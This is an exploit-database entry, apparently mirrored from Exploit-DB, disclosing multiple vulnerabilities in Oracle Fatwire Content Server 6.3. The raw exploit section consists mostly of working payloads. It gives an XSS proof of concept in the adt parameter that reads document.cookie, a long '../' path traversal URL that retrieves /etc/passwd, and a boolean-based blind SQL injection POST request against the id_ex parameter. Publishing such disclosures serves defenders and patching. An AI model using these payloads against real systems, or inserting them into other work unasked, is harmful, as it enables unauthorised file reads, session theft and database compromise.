header-logo
Suggest Exploit
vendor:
Fatwire Content Server
by:
J. Francisco Bolivar
8,8
CVSS
HIGH
XSS, Path Traversal, Blind SQL Injection
79, 22, 89
CWE
Product Name: Fatwire Content Server
Affected Version From: 6.3
Affected Version To: 6.3
Patch Exists: YES
Related CWE: N/A
CPE: oracle:fatwire_content_server
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: CentOS
2021

Oracle Fatwire 6.3 – Multiple Vulnerabilities

Adt parameter is vulnerable to XSS, Path traversal vulnerability can be exploited by accessing the URL with '../' and Blind SQL injection can be exploited by sending a malicious payload in the POST request.

Mitigation:

Input validation, Access control, Parameterized queries
Source

Exploit-DB raw data:

# Exploit Title: Oracle Fatwire 6.3 - Multiple Vulnerabilities
# Date: 29/07/2021
# Exploit Author: J. Francisco Bolivar @Jfran_cbit
# Vendor Homepage: https://www.oracle.com/index.html
# Version: 6.3
# Tested on: CentOS

1. Xss

Adt parameter is vulnerable to Xss:

https://IPADDRESS/cs/Satellite?c=Page&cid=xxxx&pagename=xxxx&adt=<img
src="a" onerror=alert(document.cookie);>

2. Path Traversal

https://IPADDRESS/cs/career/getSurvey.jsp?fn=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd

3.   Blind Sql injection

POST
/cs/Satellite?cid=xx&pagename=XXXXXXX/elementIncludesestPractice/b/searchBestPractice
HTTP/1.1
Host: IPaddress

pillar_bp=&subcategory_bp=&htlcd_bp=&id_ex=<SQL Injection>&command=XX

The vulnerable parameter is : id_ex (POST)
 Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: pillar_bp=&subcategory_bp=&htlcd_bp=&id_ex=203 AND
3958=3958&command=xxxxxT